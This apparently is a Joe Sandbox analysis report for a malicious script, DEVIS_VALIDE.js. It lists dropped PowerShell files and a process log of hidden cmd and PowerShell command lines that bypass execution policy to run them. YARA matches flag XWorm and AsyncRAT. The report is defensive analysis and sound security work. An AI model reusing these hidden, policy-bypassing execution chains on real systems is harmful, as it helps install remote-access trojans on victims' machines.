PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Networking

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1

C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1

C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
DEVIS_VALIDE.js

Target ID:	8
Start time:	05:06:19
Start date:	20/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'"
Imagebase:	0x7ff6bcda0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	12
Start time:	05:06:22
Start date:	20/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	05:06:29
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Target ID:	22
Start time:	05:06:30
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	23
Start time:	05:06:31
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x190000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	05:06:33
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Imagebase:	0x7ff7699e0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	26
Start time:	05:06:34
Start date:	20/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Imagebase:	0x7ff6bcda0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	05:06:35
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Target ID:	30
Start time:	05:06:37
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	31
Start time:	05:06:38
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true